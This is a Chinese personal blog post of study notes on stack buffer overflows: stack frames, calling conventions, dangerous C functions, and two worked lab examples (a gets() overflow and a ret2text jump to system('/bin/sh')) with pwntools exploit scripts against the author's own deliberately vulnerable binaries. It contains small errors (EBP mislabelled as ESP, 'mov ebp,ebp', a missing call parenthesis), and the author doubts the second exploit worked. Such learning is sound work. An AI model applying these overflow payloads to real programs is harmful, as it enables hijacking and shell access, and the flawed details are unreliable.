

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Sinky">
  <meta name="keywords" content="">
  
    <meta name="description" content="参考文章： https:&#x2F;&#x2F;zhuanlan.zhihu.com&#x2F;p&#x2F;113504765?utm_source&#x3D;qq https:&#x2F;&#x2F;www.secpulse.com&#x2F;archives&#x2F;192491.html 栈数据结构，先进后出，先进的数据压入栈底，最后的数据在栈顶  Push 将数据压入栈顶 Pop 将栈顶数据弹出  栈帧：每个未完成运行的函数占用一个独立的连续区域，称作栈帧   代码段：存放">
<meta property="og:type" content="article">
<meta property="og:title" content="栈溢出原理及利用学习">
<meta property="og:url" content="https://sinky.top/2022/11/10/%E6%A0%88%E6%BA%A2%E5%87%BA%E5%8E%9F%E7%90%86%E5%8F%8A%E5%88%A9%E7%94%A8%E5%AD%A6%E4%B9%A0/index.html">
<meta property="og:site_name" content="Sinky&#39;s Blog">
<meta property="og:description" content="参考文章： https:&#x2F;&#x2F;zhuanlan.zhihu.com&#x2F;p&#x2F;113504765?utm_source&#x3D;qq https:&#x2F;&#x2F;www.secpulse.com&#x2F;archives&#x2F;192491.html 栈数据结构，先进后出，先进的数据压入栈底，最后的数据在栈顶  Push 将数据压入栈顶 Pop 将栈顶数据弹出  栈帧：每个未完成运行的函数占用一个独立的连续区域，称作栈帧   代码段：存放">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://s2.loli.net/2022/11/11/RHinVQcJfPOgxSk.png">
<meta property="og:image" content="https://s2.loli.net/2022/12/05/mZN8aUwqYc1sEv2.png">
<meta property="og:image" content="https://s2.loli.net/2022/12/05/MgIlq5V1mkWZ2H8.png">
<meta property="og:image" content="https://s2.loli.net/2022/12/05/s6xOwv8ShRoUt7k.png">
<meta property="og:image" content="https://s2.loli.net/2022/12/06/U6nrtQwefZ5B9K4.png">
<meta property="og:image" content="https://s2.loli.net/2022/12/06/LxCsYFB1tkHrOJj.png">
<meta property="og:image" content="https://s2.loli.net/2022/12/06/4SFHQpMkERqGs7d.png">
<meta property="og:image" content="https://s2.loli.net/2022/12/06/aLtQBMF5CeI2iwo.png">
<meta property="article:published_time" content="2022-11-10T06:02:14.144Z">
<meta property="article:modified_time" content="2022-12-07T05:40:34.922Z">
<meta property="article:author" content="Sinky">
<meta property="article:tag" content="学习笔记">
<meta property="article:tag" content="栈溢出">
<meta property="article:tag" content="漏洞">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://s2.loli.net/2022/11/11/RHinVQcJfPOgxSk.png">
  
  
  
  <title>栈溢出原理及利用学习 - Sinky&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"sinky.top","root":"/","version":"1.9.2","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.2.0"><link rel="alternate" href="/atom.xml" title="Sinky's Blog" type="application/atom+xml">

<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Sinky</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="栈溢出原理及利用学习"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-11-10 14:02" pubdate>
          November 10, 2022 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.1k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          35 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">栈溢出原理及利用学习</h1>
            
            
              <div class="markdown-body">
                
                <p>参考文章：</p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/113504765?utm_source=qq">https://zhuanlan.zhihu.com/p/113504765?utm_source=qq</a></p>
<p><a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/192491.html">https://www.secpulse.com/archives/192491.html</a></p>
<h1 id="栈"><a href="#栈" class="headerlink" title="栈"></a>栈</h1><p>数据结构，先进后出，先进的数据压入栈底，最后的数据在栈顶</p>
<ul>
<li>Push 将数据压入栈顶</li>
<li>Pop 将栈顶数据弹出</li>
</ul>
<p>栈帧：每个未完成运行的函数占用一个独立的连续区域，称作栈帧</p>
<p><img src="https://s2.loli.net/2022/11/11/RHinVQcJfPOgxSk.png" srcset="/img/loading.gif" lazyload alt="image.png"></p>
<ul>
<li>代码段：存放可执行程序的代码，可读不可写</li>
<li>数据段：存放程序中已经初始化的静态（全局）变量，可读写</li>
<li>bss段：存放程序中未初始化的静态（全局）变量，可读写</li>
<li>堆(heap)：存放动态分配的内容，需要程序员手动分配和释放</li>
<li>栈(stack)：存放局部变量，如函数的参数、返回地址、局部变量等，有系统自动分配和释放</li>
</ul>
<h2 id="函数调用栈"><a href="#函数调用栈" class="headerlink" title="函数调用栈"></a>函数调用栈</h2><p>栈增长方向：高-&gt;低</p>
<p>ESP: 栈指针，指向栈顶低地址</p>
<p>ESP: 基址指针，指向栈底高地址</p>
<p>EIP: 指令指针，存储即将执行的程序指令地址</p>
<h3 id="函数调用约定"><a href="#函数调用约定" class="headerlink" title="函数调用约定"></a>函数调用约定</h3><p>函数调用约定是指当一个函数被调用时，函数的参数会被传递给被调用的函数和返回值会被返回给调用函数，函数的调用约定规定了执行过程中函数的调用者和被调用者之间如何传递参数以及如何恢复栈平衡。</p>
<p>常用的函数调用约定：</p>
<pre><code class="hljs">__cdecl # C/C++默认方式，参数从右到左压栈，主调函数负责栈平衡
__stdcall # windows API默认方式，参数从右向左入栈，被调函数负责栈平衡
__fastcall # 快速调用方式，将参数有限从寄存器(ECX和EDX)传入，其余参数再从右向左从栈传入
thiscall # 从右向左入栈，若参数数目固定，则类实例的this指针通过ecx传递给被调函数，被调函数自身清理堆栈，若参数数目补丁，则this指针在所有参数入栈后再入栈，主调函数清理堆栈
pascal # 从左向右入栈，支支持固定参数的函数，类型和数量完全可知，被调函数自身清理堆栈，输出的函数名称五任何修饰且全部大写
naked call # 编译器不产生保存和恢复寄存器的代码，且不能用return返回返回值，该调用约定用于特殊场合，如声明处于非C/C++上下文中的函数，并由程序员自行编写初始化和清栈的内嵌汇编指令
</code></pre>
<h3 id="函数调用开始"><a href="#函数调用开始" class="headerlink" title="函数调用开始"></a>函数调用开始</h3><p>在调用一个函数时，系统会为函数分配一个栈帧，栈帧空间为该函数独有</p>
<p>调用者调用函数过程：</p>
<ul>
<li>函数参数从右到左入栈</li>
<li>返回地址入栈</li>
<li>上一函数ebp入栈</li>
<li>balabala</li>
</ul>
<p>在上一函数ebp入栈后，就开辟了被调函数的新栈帧，然后被调函数临时变量入栈。</p>
<pre><code class="hljs">//调用前
push arg3 //32位esp-4,64位esp-8
push arg2
push arg1
call func // 压入当前指令地址，即保存返回地址，后jmp到调用函数的入口地址
push ebp // 保存旧栈帧底部，在func执行完后再pop ebp
mov ebp,ebp // 设置新栈帧的底部
sub esp,xxx  // 设置新栈帧的顶部
</code></pre>
<p>（之前在一本书里学过，但是记得不那么清楚了）</p>
<h3 id="函数调用结束"><a href="#函数调用结束" class="headerlink" title="函数调用结束"></a>函数调用结束</h3><p>函数调用结束，按照相反顺序将数据弹出栈：</p>
<ul>
<li>弹出临时变量</li>
<li>弹出调用函数的ebp值，存入ebp寄存器中</li>
<li>弹出返回地址，存在eip寄存器中</li>
</ul>
<p>返回地址即是用call指令调用函数时下一条指令的地址，存到eip中</p>
<h1 id="栈溢出原理"><a href="#栈溢出原理" class="headerlink" title="栈溢出原理"></a>栈溢出原理</h1><p>栈溢出是指向栈中写入超出限定长度的数据，一处的数据覆盖栈中其他数据，从而影响程序运行，当攻击者计算好溢出长度，编写一处数据，用我们想要的地址数据覆盖函数返回地址，那么被调函数调用完返回主函数时，就会跳转到我们覆盖的地址，通过改变程序流程，达到利用的目的。</p>
<p>目的：</p>
<ul>
<li>破坏程序内存结构</li>
<li>执行system(‘/bin/sh’)</li>
<li>执行shellcode</li>
</ul>
<h2 id="常见危险函数"><a href="#常见危险函数" class="headerlink" title="常见危险函数"></a>常见危险函数</h2><pre><code class="hljs">输入：gets scanf vxcanf
输出：sprintf
字符串：strcpy strcat bcopy
</code></pre>
<h1 id="简单栈溢出总结"><a href="#简单栈溢出总结" class="headerlink" title="简单栈溢出总结"></a>简单栈溢出总结</h1><ol>
<li>寻找危险函数：<ol>
<li>输入</li>
<li>输出</li>
<li>字符串</li>
<li>gets()，直接读取一行，忽略’x00’</li>
<li>scanf</li>
<li>vscanf</li>
<li>sprintf</li>
<li>strncpy,字符串拼接，遇到’x00’停止</li>
<li>strcat,字符串拼接，遇到’x00’停止</li>
<li>bcopy</li>
<li>寻找危险函数，快速确定程序是否有栈溢出，有则寻找位置</li>
<li>常见危险函数</li>
</ol>
</li>
<li>确定填充长度<ol>
<li>覆盖函数返回地址，直接查看ebp即可</li>
<li>覆盖栈上某个变量的内容，需计算</li>
<li>覆盖bss段某个变量的内容</li>
<li>根据实际情况覆盖特定变量或地址的内容</li>
<li>相对于栈基地址的索引，可以直接通过查看ebp相对偏移量获得</li>
<li>相对应栈顶指针的索引，需要进行调试</li>
<li>直接地址索引，相当于直接给定了地址</li>
</ol>
</li>
</ol>
<p>栈可以看成一个漏斗，栈底地址大，栈顶地址小，在一个存储单元中，按照由小到大进行存储，它的目的是赋予程序一个额方便的途径来访问特定函数的局部数据，并从函数调用者那边传递信息。</p>
<p>栈溢出属于缓冲区溢出，指程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数，因而导致与其相邻的栈中的变量的值被改变。</p>
<h1 id="调试举例"><a href="#调试举例" class="headerlink" title="调试举例"></a>调试举例</h1><h2 id="gets"><a href="#gets" class="headerlink" title="gets()"></a>gets()</h2><pre><code class="hljs">gets() # 不检查输入的字符串长度，用回车判断是否结束，很容易导致栈溢出
</code></pre>
<p>栗子：</p>
<p>参考文章：<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/a2e602da8f7c" title="栈溢出原理">https://www.jianshu.com/p/a2e602da8f7c</a></p>
<p>代码：</p>
<figure class="highlight cpp"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs cpp"> <span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br> <span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;string.h&gt;</span></span><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">success</span><span class="hljs-params">()</span></span>{<br>        <span class="hljs-built_in">puts</span>(<span class="hljs-string">"The flag is flag{Tri0mphe!!!}"</span>);<br>}<br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">vulnerable</span><span class="hljs-params">()</span> </span>{<br>        <span class="hljs-type">char</span> s[<span class="hljs-number">12</span>];<br>        <span class="hljs-built_in">gets</span>(s);<br>        <span class="hljs-built_in">puts</span>(s);<br>        <span class="hljs-keyword">return</span>;<br>}<br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc , <span class="hljs-type">int</span> **argv)</span></span>{<br>        <span class="hljs-built_in">vulnerable</span>();<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></tbody></table></figure>
<p>文件命名为a.c</p>
<p>扔进linux中编译<code>gcc -m32 -fno-stack-protector -no-pie a.c -o a </code></p>
<p><code>-m32</code> 生成32位程序<br><code>-fno-stack-protector</code> 不开启堆栈溢出保护，即不生成canary</p>
<p><code>-no-pie</code> 避免加载基址被打乱</p>
<p>checksec一下：</p>
<pre><code class="hljs">Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)
</code></pre>
<p>IDA分析：</p>
<pre><code class="hljs">int vulnerable()
{
    char s[16]; // [esp+4h] [ebp-14h] BYREF
    gets(s);
    return puts(s);
}
</code></pre>
<p>字符串s距离ebp长度为0x14，所以栈结构s为：</p>
<p><img src="https://s2.loli.net/2022/12/05/mZN8aUwqYc1sEv2.png" srcset="/img/loading.gif" lazyload alt="image.png"></p>
<p>success()的地址为0x08048456</p>
<p>构造payload:</p>
<pre><code class="hljs">0x14*'a'+'bbbb'+success_addr
</code></pre>
<p>此时栈结构为：</p>
<p><img src="https://s2.loli.net/2022/12/05/MgIlq5V1mkWZ2H8.png" srcset="/img/loading.gif" lazyload alt="image.png"></p>
<p>exp:</p>
<figure class="highlight clean"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs clean"> # coding-utf<span class="hljs-number">-8</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br> # 构造交互对象<br>p=process(<span class="hljs-string">'./a'</span>) <br> # flag函数地址<br>success_addr=<span class="hljs-number">0x08048456</span><br> # 构造payload<br>payload=<span class="hljs-string">'a'</span>*<span class="hljs-number">0x14</span>+<span class="hljs-string">'bbbb'</span>+p32(success_addr)<br> # 向程序发送字符串<br>p.sendline(payload)<br> # 将代码交互改为手动交互<br>p.interactive()<br></code></pre></td></tr></tbody></table></figure>

<p>成功！</p>
<p><img src="https://s2.loli.net/2022/12/05/s6xOwv8ShRoUt7k.png" srcset="/img/loading.gif" lazyload alt="image.png"></p>
<h1 id="基本ROP"><a href="#基本ROP" class="headerlink" title="基本ROP"></a>基本ROP</h1><p>开NX保护，可以用ROP绕过，主要思路是在缓冲区溢出基础上，利用程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值，从而控制程序的执行流程。</p>
<p>gadgets是以ret结尾的指令序列，通过这个指令序列可以修改某些地址的内容，方便控制程序的执行流程</p>
<p>利用指令集中ret指令，改变指令流的执行顺序。</p>
<p>ROP攻击前提条件：</p>
<ul>
<li>程序存在溢出，并且可以控制返回地址</li>
<li>可以找到满足条件的gadgest以及相应gadgets的地址</li>
</ul>
<h2 id="ret2text（可能没成功？）"><a href="#ret2text（可能没成功？）" class="headerlink" title="ret2text（可能没成功？）"></a>ret2text（可能没成功？）</h2><p>控制返回地址指向程序本身已有的的代码(.text)并执行。</p>
<p>代码：两个子函数func()和sys，gets位置存在栈溢出，sys函数未被调用。</p>
<figure class="highlight scss"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs scss"> <span class="hljs-selector-id">#include</span> &lt;stdlib<span class="hljs-selector-class">.h</span>&gt;<br>int <span class="hljs-built_in">sys</span>(){<br><span class="hljs-built_in">system</span>("/bin/sh");<br>}<br>int <span class="hljs-built_in">func</span>(){<br>char <span class="hljs-selector-tag">a</span><span class="hljs-selector-attr">[10]</span>;<br><span class="hljs-built_in">gets</span>(a);<br><span class="hljs-built_in">puts</span>(a);<br>}<br>int <span class="hljs-selector-tag">main</span>(){<br><span class="hljs-built_in">func</span>();<br>}<br></code></pre></td></tr></tbody></table></figure>

<p>编译：<code>gcc -g -fno-stack-protector -no-pie -o ret2text64 ret2text.c</code></p>
<p>关闭canary和pie</p>
<p>先checksec查看安全机制：</p>
<p><img src="https://s2.loli.net/2022/12/06/U6nrtQwefZ5B9K4.png" srcset="/img/loading.gif" lazyload alt="image.png"></p>
<p>got表可写，开启NX保护，用rop</p>
<h3 id="分析程序"><a href="#分析程序" class="headerlink" title="分析程序"></a>分析程序</h3><p>我们需要覆盖通过func函数中局部变量a的溢出，覆盖func函数的返回地址，将其引导到sys函数地址就可以获取shell。</p>
<p>需要：</p>
<ol>
<li>局部变量a的地址</li>
<li>func函数的返回地址</li>
<li>sys函数的地址</li>
</ol>
<h3 id="调试程序"><a href="#调试程序" class="headerlink" title="调试程序"></a>调试程序</h3><p>进入gdb-peda,在func()下断点调试：</p>
<pre><code class="hljs">l # 查看源代码
b 5 # 在第五行下断点
r # 运行程序
</code></pre>
<p><img src="https://s2.loli.net/2022/12/06/LxCsYFB1tkHrOJj.png" srcset="/img/loading.gif" lazyload alt="image.png"></p>
<pre><code class="hljs">p &amp;a # 打印当前局部变量a的地址
p $rbp # 打印rbp地址
</code></pre>
<p><img src="https://s2.loli.net/2022/12/06/4SFHQpMkERqGs7d.png" srcset="/img/loading.gif" lazyload alt="image.png"></p>
<p>变量a地址为0xffe376</p>
<p>rbp=0xffe380</p>
<p>IDA找到sys函数地址为：0x400577</p>
<p><img src="https://s2.loli.net/2022/12/06/aLtQBMF5CeI2iwo.png" srcset="/img/loading.gif" lazyload alt="image.png"></p>
<p>func函数返回地址，在64位程序中，在rbp之后8字节，所以func_addr=rbp+8=0xffe388</p>
<h3 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h3><p>分析payload构成，填充局部变量a直到返回地址，然后再将后面8个字节的位置填充为sys函数的地址。</p>
<p>偏移长度=返回地址-局部变量地址=0x12=18</p>
<pre><code class="hljs">payload='A'*18+p64(0x400577)
</code></pre>
<p>exp:</p>
<pre><code class="hljs">from pwn import *
p=process("./ret2text64")
payload='A'*18+p64(0x400577)
p.sendline(payload)
p.interactive
</code></pre>
<p>但执行了exp之后，并没有给我什么显示，所以我不确定。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">#学习笔记</a>
      
        <a href="/tags/%E6%A0%88%E6%BA%A2%E5%87%BA/">#栈溢出</a>
      
        <a href="/tags/%E6%BC%8F%E6%B4%9E/">#漏洞</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>栈溢出原理及利用学习</div>
      <div>https://sinky.top/2022/11/10/栈溢出原理及利用学习/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>Sinky</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>November 10, 2022</div>
        </div>
      
      
      <div class="license-meta-item">
        <div>Licensed under</div>
        <div>
          
            
            
              <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
              <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                <i class="iconfont icon-by"></i>
              </span>
              </a>
            
          
        </div>
      </div>
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/11/15/%E9%9D%B6%E5%9C%BA%EF%BC%9A%E6%9F%90%E9%98%B2%E7%81%AB%E5%A2%99%E9%BB%98%E8%AE%A4%E5%8F%A3%E4%BB%A4/" title="靶场：某防火墙默认口令">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">靶场：某防火墙默认口令</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/11/10/PWN%E7%9A%84exp%E7%BC%96%E5%86%99%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/" title="PWN的exp编写学习记录">
                        <span class="hidden-mobile">PWN的exp编写学习记录</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;Table of Contents</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


